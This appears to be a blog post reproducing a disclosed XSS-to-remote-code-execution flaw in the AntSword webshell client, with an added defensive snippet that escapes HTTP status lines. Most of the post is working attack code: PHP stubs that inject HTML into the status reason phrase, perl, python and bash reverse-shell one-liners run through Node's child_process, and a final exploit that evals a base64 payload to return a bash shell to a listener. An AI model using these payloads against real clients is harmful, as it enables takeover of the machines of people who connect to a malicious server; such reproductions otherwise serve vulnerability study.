A few days ago an XSS (leading to RCE) in AntSword (蚁剑) was disclosed, so I reproduced it.
```php
<?php
// Fake target: the HTML payload rides in the reason phrase of the HTTP status line
header('HTTP/1.1 500 <img src=# onerror=alert(/AntSword-XSS/)>');
?>
```
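The root cause is that the client inserts the status line's reason phrase into its HTML unescaped. As an added example (not from the original post and not AntSword's code; the function names are my own), here is what a client should do instead: parse the status line, flag a reason phrase that is not a legitimate RFC 7230 reason phrase, and escape it before rendering.

```javascript
// Added defensive example: parse, flag and escape an HTTP status line.
// Not from the original post or from AntSword; names are constructed.

// Parse "HTTP/1.1 500 Some text" into version, status code and reason phrase.
function parseStatusLine(line) {
  const m = /^HTTP\/(\d)\.(\d) (\d{3})(?: (.*))?$/.exec(line);
  if (!m) return null;
  return { version: `${m[1]}.${m[2]}`, code: Number(m[3]), reason: m[4] || '' };
}

// RFC 7230: reason-phrase = *( HTAB / SP / VCHAR / obs-text ).
// Bytes outside that set, or markup/handler-looking fragments, never occur in a
// legitimate reason phrase and are worth flagging before anything is rendered.
function isSuspiciousReason(reason) {
  if (!/^[\t\x20-\x7e\x80-\xff]*$/.test(reason)) return true;
  return /[<>"'`]|on\w+\s*=|javascript:/i.test(reason);
}

// Escape everything that could open a tag, attribute or template literal.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;',
                '"': '&quot;', "'": '&#39;', '`': '&#96;' };
  return s.replace(/[&<>"'`]/g, c => map[c]);
}

// What the client should actually put into its DOM for a status line.
function safeRender(line) {
  const p = parseStatusLine(line);
  if (!p) return { html: '(unparseable status line)', suspicious: true };
  return {
    html: `HTTP ${p.code} ${escapeHtml(p.reason)}`,
    suspicious: isSuspiciousReason(p.reason),
  };
}

// Constructed sample: the status line the PHP stub above produces.
const SAMPLE_STATUS_LINE = 'HTTP/1.1 500 <img src=# onerror=alert(/AntSword-XSS/)>';
```

Rendering `safeRender(SAMPLE_STATUS_LINE).html` yields inert text (`&lt;img ...&gt;`) and `suspicious` is true, while a normal `HTTP/1.1 200 OK` passes clean.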
Reverse shell
Put whichever reverse-shell one-liner you prefer inside exec(), then base64-encode the whole thing.
perl:
```javascript
require('child_process').exec(`perl -e 'use Socket;$i="127.0.0.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'`,(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); });
```
python:
```javascript
require('child_process').exec('python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);\'',(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); });
```
bash:
```javascript
require('child_process').exec('bash -i >& /dev/tcp/127.0.0.1/4444 0>&1',(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); });
```
Final exploit
```php
<?php
// Reason phrase carries an onerror handler that base64-decodes and evals the payload
header("HTTP/1.1 406 Not <img src=# onerror='eval(new Buffer(`base64-encoded payload`,`base64`).toString())'>");
?>
```
Start nc listening on 4444, add the webshell in AntSword, double-click to open it, and a bash shell comes back successfully.
PS:
There is a pitfall here: with py, bash, nc and the like the shell does not come back, but perl works. No idea why; I'll look into it later.